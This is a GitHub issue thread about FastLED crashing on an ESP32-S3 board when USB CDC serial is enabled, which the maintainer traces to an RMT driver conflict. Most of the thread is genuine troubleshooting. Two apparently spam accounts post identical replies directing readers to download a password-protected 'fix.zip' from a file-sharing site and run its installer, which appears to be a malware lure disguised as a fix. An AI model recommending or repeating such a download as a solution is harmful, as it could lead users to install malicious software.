FastLED/FastLED #1677: Update to: Closed issue #1655 - Works (except.... Serial)

bsohn73, 2024-08-26:
I tried out everything with the New Releases.. Latest ESP32S3 Board Package and 3.7.3.

So as long as I do not turn on USB CDC at boot... everything seems to work fine. 

If that flag is on then the Legacy crash returns and the program is unable to run..

I am using a Modified version of your basic program with a couple of Serial.print satements which of course do not get sent over serial unless the CDC serial is enabled.

Code:
```
#include <FastLED.h>
#define NUM_LEDS 64
CRGB leds[NUM_LEDS];
byte i = 0;
byte c = NUM_LEDS - 1;
void setup() { FastLED.addLeds<NEOPIXEL, 14>(leds, NUM_LEDS); }
void loop() 
{
  Serial.println("Start");
  i = 0;
  c = NUM_LEDS - 1;

  for (byte i = 0; i < NUM_LEDS; i++)
  {
	  leds[i] = CRGB::White; FastLED.show(); delay(30);
	  leds[i] = CRGB::Black; FastLED.show(); delay(30);
  }
  Serial.println("End");
}
```

Received error Dump when CDC is enabled:
```
E (91) rmt(legacy): CONFLICT! driver_ng is not allowed to be used with the legacy driver

abort() was called at PC 0x42007ffb on core 0

Backtrace: 0x403772aa:0x3fceb200 0x4037bd55:0x3fceb220 0x403818e9:0x3fceb240 0x42007ffb:0x3fceb2c0 0x4200bc86:0x3fceb2e0 0x403775af:0x3fceb310 0x403cd852:0x3fceb340 0x403cdafe:0x3fceb380 0x403c98d5:0x3fceb4b0 0x40045c01:0x3fceb570 0x40043ab6:0x3fceb6f0 0x40034c45:0x3fceb710

ELF file SHA256: 69ceaa717f489bfb

E (120) esp_core_dump_flash: Core dump flash config is corrupted! CRC=0x7bd5c66f instead of 0x0
E (128) esp_core_dump_elf: Elf write init failed!
E (133) esp_core_dump_common: Core dump write failed with error=-1
Rebooting...
ESP-ROM:esp32s3-20210327
Build:Mar 27 2021
rst:0xc (RTC_SW_CPU_RST),boot:0x8 (SPI_FAST_FLASH_BOOT)
Saved PC:0x403778bd
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3818,len:0x508
load:0x403c9700,len:0x4
load:0x403c9704,len:0xad0
load:0x403cc700,len:0x29e4
entry 0x403c9880
```

So it still seems to have some conflict somewhere with the driver sets
The board is an ESP32s3 Develoment 8x8 Matrix board.

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

bsohn73, 2024-08-26:
> Download
> https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

Unfortunately I am using a Mac with Arduino IDE 2.2.1 so I cannot use that .exe

bsohn73, 2024-08-26:
Also Downgrading to the Older esp32 Board Library 2.0.17 using FastLED 3.7.3 does work.. as a workaround.

zackees, 2024-08-26:
I'm not following what a CDC is.

A lot of boards with built in WS2812 leds are using the new driver and hence, cause a boot crash when fastled attempts to use the legacy driver.

zackees, 2024-08-26:
Found out what CDC was. Yeah, looks like it's connecting to the LED panel and using the new idf RMT driver to send data to the leds so boom.

This won't be fixed until a new RMT driver for idf 5.1 is made.

bsohn73, 2024-08-26:
OK just thought I would report it to see if it was something that may have been missed or something else.. I had a feeling the CDC Serial was loading the ner driver by the incompatibility note coming back.

closed 2024-11-01 by zackees